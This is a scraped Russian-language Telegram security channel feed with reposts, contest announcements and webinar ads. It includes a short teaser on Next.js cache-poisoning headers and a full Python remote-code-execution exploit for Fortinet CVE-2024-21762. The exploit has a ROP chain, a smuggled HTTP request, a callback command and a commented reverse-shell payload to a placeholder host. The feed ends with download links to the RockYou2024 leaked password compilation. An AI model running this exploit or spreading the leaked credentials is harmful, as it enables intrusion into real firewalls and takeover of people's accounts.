Отравление кеша. Разбираемся с кешированием страниц и атаками на него
#webpentest
Отравление кеша (cache poisoning) — это вид атаки, при котором атакующий вносит в кеш системы некорректные данные. Когда система пытается их использовать, это приводит к проблемам: от нарушения работы до компрометации данных. В этой статье я покажу отравление кеша на примере реальной уязвимости в движке сайта, а также разберемся c HTTP-заголовками, которые препятствуют этой атаке.
🔓 Читать далее
🌚 @poxek
#webpentest
Отравление кеша (cache poisoning) — это вид атаки, при котором атакующий вносит в кеш системы некорректные данные. Когда система пытается их использовать, это приводит к проблемам: от нарушения работы до компрометации данных. В этой статье я покажу отравление кеша на примере реальной уязвимости в движке сайта, а также разберемся c HTTP-заголовками, которые препятствуют этой атаке.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SHADOW:Group
x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.Более подробно про каждый из способов, а также некоторые советы
#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Конкурс проходок на 🕐 🕑 🕒 🕓 🕔 🕕 🕖
#offzone2024 #конкурс
➡️ Конкурс на 2 проходки на OFFZONE
➡️ Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE
➡️ Сроки: 2 недели с момента выхода поста
➡️ Условия оценки: наибольшее кол-во положительных реакций на сообщении и если будет сложная борьба, то моё мнение и @fun9ral.
➡️ Условия участия: 1 мем = 1 сообщение с тегом #offzone2024
Условие обязательное, не будете следить, не будете участвовать.
Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)
🌚 @poxek
#offzone2024 #конкурс
Условие обязательное, не будете следить, не будете участвовать.
Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13😁5 4👾1
Похек
Конкурс проходок на 🕐 🕑 🕒 🕓 🕔 🕕 🕖 #offzone2024 #конкурс ➡️ Конкурс на 2 проходки на OFFZONE ➡️ Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE ➡️ Сроки: 2 недели с момента выхода поста ➡️ Условия оценки: наибольшее кол-во положительных реакций…
Обновил пост. Дописал сроки - 2 недели.
🌚3
Forwarded from Mobile AppSec World (Yury Shabalin)
Как построить процесс безопасной разработки и не сойти с ума
Всем привет!
Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!
Уверен, будет интересно)
Если интересно, подключайтесь!
Всем привет!
Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!
Уверен, будет интересно)
Если интересно, подключайтесь!
Код ИБ
Внедрение DevSecOps: какие препятствия могут возникнуть и как их преод
На эфире мы расскажем, на что стоит обратить внимание при внедрении DevSecOps, а также приведем примеры кейсов.
Forwarded from Mobile AppSec World (Yury Shabalin)
Персональные данные и мобильные приложения, как они связаны?
Всем привет!
Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄
И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?
Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.
Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.
Приятного чтения!
#habr #ПДн
Всем привет!
Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄
И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?
Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.
Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.
Приятного чтения!
#habr #ПДн
Хабр
Защита персональных данных в мобильных приложениях: как не нарушить закон
Всем привет! На связи снова Юрий Шабалин, генеральный директор «Стингрей Технолоджиз». В предыдущей статье я рассказывал о влиянии Профиля защиты ЦБ РФ на мобильные приложения. В продолжение темы...
🔥4👾3
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
➡️ Атакуемые продукты:
- FortiOS
- FortiProxy
Эксплойт:
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
🌚 @poxek
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
- FortiOS
- FortiProxy
Эксплойт:
import socket
import time
import argparse
TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN
def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock
def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)
def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;
rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;
rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;
rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8
pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;
call_execl = b"%80%c1%43%00%00%00%00%00"
bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'
form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body
send_payload(data, TARGET, PORT)
# Short delay to ensure the server processes the first request
time.sleep(2)
# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"
send_payload(data, TARGET, PORT)
if __name__ == "__main__":
main()
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>
Please open Telegram to view this post
VIEW IN TELEGRAM
Похек
Конкурс проходок на 🕐 🕑 🕒 🕓 🕔 🕕 🕖 #offzone2024 #конкурс ➡️ Конкурс на 2 проходки на OFFZONE ➡️ Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE ➡️ Сроки: 2 недели с момента выхода поста ➡️ Условия оценки: наибольшее кол-во положительных реакций…
Обновление по конкурсу:
Добавляю ещё один приз! Каждому победителю, я лично подарю футболку Похек на OFFZONE. Как вам такое?)
Дизайн/цвет сможете выбрать сами
Добавляю ещё один приз! Каждому победителю, я лично подарю футболку Похек на OFFZONE. Как вам такое?)
Дизайн/цвет сможете выбрать сами
🔥16 6😁2
Похек
Обновление по конкурсу: Добавляю ещё один приз! Каждому победителю, я лично подарю футболку Похек на OFFZONE. Как вам такое?) Дизайн/цвет сможете выбрать сами
Раз народ просит больше футболок на розыгрыш. То надо дать больше футболок!
➡️ 2 мема - 2 проходки - 2 футболки
➡️ 3 мема, не ставших победителей, но с не менее годными мемами - 3 футболки
➡️ Обязательное условие, вы должны приехать на мероприятие и я отдам в руки. Доставку не делаю в рамках этого конкурса
P.S. не забывайте ставить #offzone2024, иначе участие не засчитывается
P.S. не забывайте ставить #offzone2024, иначе участие не засчитывается
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12⚡3🌚1
Forwarded from KazDevOps
Напоминаем, что 16 июля в 19:00 по Алматы состоится бесплатный вебинар. Вы погрузитесь в Serverless и на практике узнаете возможности бессерверной архитектуры.
🚩 Мы добавили в программу еще одного спикера — СОО Core 24/7 Александра Калинина. Саша расскажет про миграцию в облако на реальном кейсе. Какие были сложности, как их преодолели и что получил клиент в результате.
Будет интересно всем, кто занимается cloud migration или планирует делать это в будущем 💪
Также в программе:
👉 Регистрируйтесь здесь
Этот вебинар для техлидов, СТО, DevOps специалистов и руководителей IT бизнеса, которые хотят оценить необходимость в cloud migration и оптимизировать этот процесс, узнать об альтернативах, улучшить управление данными.
Зовите коллег, начальников и приходите сами. До встречи 🤝
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from PRO:PENTEST
Всем привет!
Ты всегда хотел поучавствовать в проекте по физическому пентесту?
Тогда этот челендж для тебя!
Все условия, а также информация о призах в видео🔥
https://www.youtube.com/watch?v=WE-GAswXMUA
Ты всегда хотел поучавствовать в проекте по физическому пентесту?
Тогда этот челендж для тебя!
Все условия, а также информация о призах в видео
https://www.youtube.com/watch?v=WE-GAswXMUA
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Участвуй в квесте по Физическому пентесту
Всем привет для участия в конкурсе нужно подписаться на паблики:
https://news.1rj.ru/str/pro_pentest
https://news.1rj.ru/str/fck_harder
https://news.1rj.ru/str/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
https://news.1rj.ru/str/pro_pentest
https://news.1rj.ru/str/fck_harder
https://news.1rj.ru/str/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
⚡5🔥2😁2
Forwarded from Яндекс | Охота за ошибками
Мы готовим кое-что особенное в августе, но что именно, пока секрет 🎁
Среди всех, кто в течение июля принесёт >=1 валидный баг любого нашего сервиса, мы разыграем кое-что интересное. Что именно это будет, узнаете совсем скоро, а пока…
Удачной охоты!⚡️
Среди всех, кто в течение июля принесёт >=1 валидный баг любого нашего сервиса, мы разыграем кое-что интересное. Что именно это будет, узнаете совсем скоро, а пока…
Удачной охоты!
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🔥1
У кого есть акк на нужном форуме, скачайте и расшарьте, пожалуйста. Буду очень благодарен
🔥4
Forwarded from Информация опасносте
Компиляция на 10 млрд паролей
https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/
https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/
Cybernews
RockYou2024: 10 billion passwords leaked in the largest compilation of all time
RockYou2024, the largest password compilation, leaked on a hacker forum.
🔥12⚡2😁2👾2
Информация опасносте
Компиляция на 10 млрд паролей https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/
скачиваем 45 гб...
как скачается, я залью на нормальный диск и закину ссылку
как скачается, я залью на нормальный диск и закину ссылку
🔥43 12😁2
Похек
скачиваем 45 гб... как скачается, я залью на нормальный диск и закину ссылку
RockYou2024
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
🌚 @poxek
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥73 16⚡6😁3